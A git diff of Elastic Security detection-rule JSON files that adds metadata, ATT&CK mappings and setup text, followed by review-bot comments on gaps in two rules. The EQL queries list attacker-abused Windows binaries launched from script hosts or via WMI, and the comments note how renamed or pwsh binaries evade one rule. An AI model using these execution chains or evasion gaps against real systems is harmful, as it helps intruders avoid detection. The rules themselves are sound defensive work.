or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json index ce2a713a5c7d2..8c47faa3dfb71 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 User Restricted from Sending Email", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_hour_for_a_user_to_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_hour_for_a_user_to_logon.json similarity index 69% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_hour_for_a_user_to_logon.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_hour_for_a_user_to_logon.json index 8848ec3b7b8c6..3fd62e4ad869e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_hour_for_a_user_to_logon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_hour_for_a_user_to_logon.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 1 + "version": 2 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_source_ip_for_a_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_source_ip_for_a_user.json
similarity index 70%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_source_ip_for_a_user.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_source_ip_for_a_user.json
index 638e18b85bc01..42e93fe9f872c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_source_ip_for_a_user.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_source_ip_for_a_user.json
@@ -22,8 +22,26 @@
 "Elastic",
 "Authentication",
 "Threat Detection",
- "ML"
+ "ML",
+ "Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/"
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_user_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_user_logon.json
similarity index 74%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_user_logon.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_user_logon.json
index d5d055bfa1658..4e856beda0e56 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_user_logon.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_user_logon.json
@@ -22,8 +22,26 @@
 "Elastic",
 "Authentication",
 "Threat Detection",
- "ML"
+ "ML",
+ "Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/"
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 3
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_user_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_linux_anomalous_user_name.json
similarity index 85%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_user_name.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_linux_anomalous_user_name.json
index c8b3f97d77f1f..79fa18cc36b35 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_user_name.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_linux_anomalous_user_name.json
@@ -26,8 +26,26 @@
 "Host",
 "Linux",
 "Threat Detection",
- "ML"
+ "ML",
+ "Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/"
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_user_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_anomalous_user_name.json
similarity index 86%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_user_name.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_anomalous_user_name.json
index bffcf3ee7eb15..57cdb9246a73d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_user_name.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_anomalous_user_name.json
@@ -26,8 +26,26 @@
 "Host",
 "Windows",
 "Threat Detection",
- "ML"
+ "ML",
+ "Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/"
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_type10_remote_login.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_rare_user_type10_remote_login.json
similarity index 79%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_type10_remote_login.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_rare_user_type10_remote_login.json
index 44d20761419fc..675d93f43048a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_type10_remote_login.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_rare_user_type10_remote_login.json
@@ -26,8 +26,26 @@
 "Host",
 "Windows",
 "Threat Detection",
- "ML"
+ "ML",
+ "Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/"
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 6
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json
index 8ceca899412b2..7db155bc005a6 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json
@@ -14,13 +14,42 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "O365 Email Reported by User as Malware or Phish",
- "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n",
 "references": [
 "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us"
 ],
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "rule.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -61,5 +90,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json
index d016add9637e3..0d2513dc042a5 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json
@@ -11,10 +11,29 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Unauthorized Access to an Okta Application",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt\n",
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "4edd3e1a-3aa0-499b-8147-4d2ea43b1613",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -70,5 +89,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json
index dd5f00a4a3e35..9c79e8c157b21 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json
@@ -15,13 +15,43 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS IAM Password Recovery Requested",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:PasswordRecoveryRequested and event.outcome:success\n",
 "references": [
 "https://www.cadosecurity.com/an-ongoing-aws-phishing-campaign/"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "69c420e8-6c9e-4d28-86c0-8a2be2d1e78c",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -50,5 +80,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json
index b3d3d7f94f113..5fc24a67effab 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_from_the_internet.json
@@ -17,6 +17,38 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "143cb236-0956-4f42-a706-814bcaa0cf5a",
 "severity": "high",
@@ -47,5 +79,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 11
+ "version": 12
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json
index 98a900c63695b..7b7a913251464 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_rpc_remote_procedure_call_to_the_internet.json
@@ -17,6 +17,38 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "32923416-763a-4531-bb35-f33b9232ecdb",
 "severity": "high",
@@ -47,5 +79,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 11
+ "version": 12
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json
index 58e985b001f5d..48175e02df69d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_script_executing_powershell.json
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Script Executing PowerShell", - "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs,\nsuch as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but\ncan also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by 
regular users is unlikely. In the case of authorized benign true positives\n(B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs,\nsuch as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but\ncan also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. 
In the case of authorized benign true positives\n(B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"cscript.exe\", \"wscript.exe\") and process.name : \"powershell.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json index d7bc4582cf891..9369274b2961b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_scripts_process_started_via_wmi.json 
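Review bot: The new `required_fields` describe a query that still identifies the child solely by `process.name : "powershell.exe"`, so a renamed binary or `pwsh.exe` launched from `wscript.exe`/`cscript.exe` is not matched, although the sibling WMI rule in this same commit already keys on `process.pe.original_file_name` for exactly that reason. Consider `process.name : ("powershell.exe", "pwsh.exe") or process.pe.original_file_name : "PowerShell.EXE"` and add `process.pe.original_file_name` to `required_fields` so the two stay in step. The `setup` text moved out of the note is the old `## Config` body unchanged apart from the dropped heading, which is fine.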
@@ -12,7 +12,64 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Script Interpreter Executing Process via WMI", - "query": "sequence by host.id with maxspan = 5s\n [library where dll.name : \"wmiutils.dll\" and process.name : (\"wscript.exe\", \"cscript.exe\")]\n [process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"wmiprvse.exe\" and\n user.domain != \"NT AUTHORITY\" and\n (process.pe.original_file_name :\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) or\n process.executable : (\"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n )\n ]\n", + "query": "sequence by host.id with maxspan = 5s\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\") and process.name : (\"wscript.exe\", \"cscript.exe\")]\n [process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"wmiprvse.exe\" and\n user.domain != \"NT AUTHORITY\" and\n (process.pe.original_file_name :\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) or\n process.executable : (\"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n )\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b64b183e-1a76-422d-9179-7b389513e74d", "severity": "medium", @@ -48,5 +105,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json index 794d06734ef53..30e4b0f02ead2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_smb_windows_file_sharing_activity_to_the_internet.json 
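Review bot: The first sequence stage is widened to accept `event.category == "process"` events carrying `event.action : "Image loaded*"` and `file.name : "wmiutils.dll"` (Sysmon-style image-load data), but the second stage still depends on `user.domain != "NT AUTHORITY"`; if `user.domain` is not populated on that data and EQL's null-comparison semantics apply, those events are dropped rather than passed, so the widening could yield no alerts on exactly the source it targets — worth confirming against a Sysmon sample. `(user.domain == null or user.domain != "NT AUTHORITY")` keeps the SYSTEM exclusion without requiring the field to exist. Separately, `required_fields` lists both `dll.name` and `file.name` although the query needs only one of them per source, so anything that treats the list as strictly required would flag a Sysmon-only index for the missing `dll.name`.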
